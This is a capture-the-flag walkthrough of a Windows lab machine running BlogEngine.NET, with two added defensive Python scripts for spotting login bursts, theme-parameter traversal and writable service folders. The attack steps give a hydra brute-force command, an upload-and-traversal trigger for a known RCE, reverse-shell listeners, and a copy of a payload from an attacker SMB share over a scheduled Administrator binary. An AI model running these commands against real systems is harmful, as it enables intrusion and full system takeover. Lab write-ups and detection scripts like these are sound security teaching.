HackPack
Difficulty: Easy
Score: 3/10
Target
- 2 flags
- system privilege
Process
Enumeration
Running nmap
nmap -sC -sV -o nmap.txt -Pn 10.10.45.21
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-07-29T16:16:07+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We see that port 80 is open; browsing to it shows a picture of Pennywise.
Going through the menu, a login page is found; the site is running BlogEngine.NET.
To log in we brute-force the password with hydra, using admin as the username.
Burp Suite could be used for the brute force as well.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.79.241 http-post-form "/Account/login.aspx:__VIEWSTATE=ScTUsDEL61RxXQbUkxPIvjWwWIPtRoGua7VlvlhkXMv83IlH8nDZNBJap5qDDRHYpohgQkDHiy%2FBC%2BxgOpa%2BQyclcuurGR6oEQrtrgMMab51BRVITHbw51etTYHg%2BOSqlTEdhO1sq6LyFJ6OiiTP6d9DJf02wqbnAd2tPNuj2XvUivov&__EVENTVALIDATION=IwDYcG9QBNf8p2xPKx%2B%2Fw5JxMDpBvm8H7wN1ksA5dw9A8UBpnwOCo0Dw%2BPk5zNJmkB9lQ%2FliisMfMuMuK0XXTqgvEqLeivDFKIVc5TL58r9bwhfN6No%2FVNcCXAAYsaZZOdkMyqjZVNaOltsfMh1u4e0p9aFSTmWecZYwxusByDyG%2FSae&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -t 64
[80][http-post-form] host: 10.10.79.241 login: admin password: ******
1 of 1 target successfully completed, 1 valid password found
With the credentials obtained (under the writeup rules the password can't be shown) we log in to the CMS and see that the machine is running BlogEngine version 3.3.6.
Exploitation
Doing a quick search for exploits, I found the following RCE vulnerability: https://www.exploit-db.com/exploits/46353
To obtain a reverse shell, we copy that code to a file named PostView.ascx, then browse to http://IP/admin/app/editor/editpost.cshtml to upload the file.
To trigger the reverse shell we browse to http://IP/?theme=../../App_Data/files
Checking netcat, we obtain a reverse connection:
nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.79.241] 49326
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved
c:\windows\system32\inetsrv>whoami
iis apppool\blog
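On the defensive side, both web-facing steps above leave distinctive traces in the IIS access log: a burst of POSTs to /Account/login.aspx from a single client (the hydra run), and a request whose theme parameter contains ../ (the trigger URL). Because a failed BlogEngine login is answered with HTTP 200 and a "Login Failed" page (which is exactly why the hydra command above matches on that string), status codes do not separate success from failure, so request volume is the signal for the first pattern. The script below is an added example, not part of the original writeup: it parses W3C-format IIS log lines and flags both patterns. The log lines, the field subset, the 192.0.2.7 client and the 20-requests-per-minute threshold are constructed for the example; the other addresses are the ones shown in the writeup.

```python
"""Flag credential-guessing bursts against /Account/login.aspx and
directory traversal in the BlogEngine 'theme' parameter in IIS W3C logs."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote

# Constructed IIS log excerpt (not taken from the page). The field list is the
# standard W3C extended format trimmed to the columns this check needs.
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 8.5",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status",
    "2020-07-29 16:20:01 10.10.79.241 GET /Account/login.aspx - 80 - 10.11.14.106 200",
] + [
    # 40 login POSTs in 20 seconds from one client: a password-guessing burst
    f"2020-07-29 16:20:{2 + i // 2:02d} 10.10.79.241 POST /Account/login.aspx - 80 - 10.11.14.106 200"
    for i in range(40)
] + [
    "2020-07-29 16:21:10 10.10.79.241 GET /admin/app/editor/editpost.cshtml - 80 admin 10.11.14.106 200",
    "2020-07-29 16:21:30 10.10.79.241 GET / theme=../../App_Data/files 80 - 10.11.14.106 200",
    "2020-07-29 16:22:00 10.10.79.241 GET / theme=Standard 80 - 192.0.2.7 200",
]


def parse_iis(lines):
    """Yield one dict per log line, naming columns from the #Fields header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        if fields is None:
            raise ValueError("log data appeared before a #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-attribute columns
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        yield rec


def login_bursts(records, threshold=20, window=timedelta(seconds=60), path="/account/login.aspx"):
    """Return {client_ip: first_alert_time} for clients that POST to the login
    page more than `threshold` times inside a sliding `window`."""
    recent = defaultdict(deque)  # per-client timestamps inside the window
    flagged = {}
    for rec in records:
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != path:
            continue
        ip = rec["c-ip"]
        q = recent[ip]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        if len(q) > threshold and ip not in flagged:
            flagged[ip] = rec["ts"]
    return flagged


def traversal_in_theme(records):
    """Return (time, client, raw query) for requests whose 'theme' value
    contains a parent-directory component after (double) URL decoding."""
    hits = []
    for rec in records:
        query = rec["cs-uri-query"]
        if query == "-":  # IIS writes '-' when there is no query string
            continue
        for value in parse_qs(query).get("theme", []):
            parts = unquote(value).replace("\\", "/").split("/")
            if ".." in parts:
                hits.append((rec["ts"], rec["c-ip"], query))
                break
    return hits


def analyse(lines=SAMPLE_LOG):
    """Run both checks over a log and return their findings together."""
    records = list(parse_iis(lines))
    return {"bursts": login_bursts(records), "traversal": traversal_in_theme(records)}


if __name__ == "__main__":
    result = analyse()
    for ip, when in result["bursts"].items():
        print(f"login burst from {ip}, threshold crossed at {when}")
    for when, ip, query in result["traversal"]:
        print(f"theme traversal from {ip} at {when}: {query}")
```

On a real host the same functions can be fed the contents of the files under %SystemDrive%\inetpub\logs\LogFiles; the thresholds are deliberately low for the constructed sample and should be tuned to the site's normal login traffic.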
Privilege Escalation
For this part we use an enumeration tool called winPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Transfer the binary to the victim machine with netcat or Python.
After reading all the colored output of winPEAS, I found this uncommon binary:
WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
Going to that directory, we find the following log file:
08/07/20 04:06:34,Process Ended. PID:480,ExitCode:4,Message.exe (Administrator)
08/07/20 04:07:02,Event Started Ok, (Administrator)
08/07/20 04:07:33,Process Ended. PID:2420,ExitCode:4,Message.exe (Administrator)
08/07/20 04:08:02,Event Started Ok, (Administrator)
08/07/20 04:08:33,Process Ended. PID:800,ExitCode:4,Message.exe (Administrator)
The scheduler runs Message.exe automatically every 30 seconds, as Administrator.
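What makes this escalation possible is the combination of the two findings above: a service binary directory that grants Everyone write access, and a scheduler that runs a file from that directory as Administrator every 30 seconds. A defender can audit for the first condition directly. The script below is an added example, not part of the writeup or of winPEAS: it parses icacls output for each service's binary directory and reports ACEs where a broad principal (Everyone, Users, Authenticated Users, INTERACTIVE) holds a right that allows creating, replacing or deleting files. The icacls output is constructed; the SystemScheduler entry mirrors the winPEAS line above, using the long form of the short path C:\PROGRA~2\SYSTEM~1, and the "Example Service" entry is a made-up correctly permissioned directory for comparison.

```python
"""Report service binary directories that low-privileged principals can write to,
from saved `icacls` output."""
import re

# icacls right tokens that allow creating, replacing or deleting files:
# generic full/modify/write plus the specific write and delete rights.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "DE", "DC", "WDAC", "WO", "GA", "GW"}

# Principals that every local user is effectively a member of.
BROAD_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# Constructed icacls output (not from the page). First entry: Everyone holds
# generic write (W) on the directory, as winPEAS reported; second entry: only
# SYSTEM and Administrators can write.
SERVICES = [
    {
        "name": "WindowsScheduler",
        "dir": r"C:\Program Files (x86)\SystemScheduler",
        "icacls": r"""C:\Program Files (x86)\SystemScheduler Everyone:(OI)(CI)(W)
                                        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                        BUILTIN\Administrators:(I)(OI)(CI)(F)
                                        BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
""",
    },
    {
        "name": "ExampleService",  # hypothetical service for comparison
        "dir": r"C:\Program Files\Example Service",
        "icacls": r"""C:\Program Files\Example Service NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                 BUILTIN\Administrators:(I)(OI)(CI)(F)
                                 BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
""",
    },
]


def parse_icacls(path, text):
    """Parse `icacls <path>` output into [(principal, {tokens})].

    icacls prints the path and the first ACE on one line and indents the
    remaining ACEs; each ACE is '<principal>:(flag)(flag)(rights)'. The path
    is passed in (we ran icacls on it) so it can be stripped without guessing
    where a path containing spaces ends and the principal begins. Inheritance
    flags such as (I)(OI)(CI) end up in the token set alongside the rights.
    """
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        principal, sep, perms = line.rpartition(":")
        if not sep:
            continue
        tokens = set()
        for group in re.findall(r"\(([A-Z,]+)\)", perms):
            tokens.update(group.split(","))
        aces.append((principal, tokens))
    return aces


def weak_service_dirs(services):
    """Return (service, principal, sorted write rights) for every broad
    principal that can write into a service's binary directory."""
    findings = []
    for svc in services:
        for principal, tokens in parse_icacls(svc["dir"], svc["icacls"]):
            granted = tokens & WRITE_RIGHTS
            if principal.lower() in BROAD_PRINCIPALS and granted:
                findings.append((svc["name"], principal, sorted(granted)))
    return findings


if __name__ == "__main__":
    for name, who, rights in weak_service_dirs(SERVICES):
        print(f"{name}: {who} can write to the binary directory ({','.join(rights)})")
```

To run this against a live host, take each service's ImagePath, resolve 8.3 short names such as C:\PROGRA~2\SYSTEM~1 to their long form, and capture `icacls "<directory>"` into the icacls field. The fix for a finding like the first one is to remove the write-capable ACE for Everyone so that only SYSTEM and Administrators can modify what the scheduler executes.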
Transfer the reverse shell to the victim machine.
We first rename Message.exe and then copy our reverse shell into its place:
C:\Program Files (x86)\SystemScheduler>ren Message.exe Message.exe.bak
C:\Program Files (x86)\SystemScheduler>copy \\10.11.14.106\smbfolder\Message.exe
1 file(s) copied.
Finally, after a few seconds we obtain a reverse connection as Administrator:
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.79.241] 49517
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\>whoami
hackpark\administrator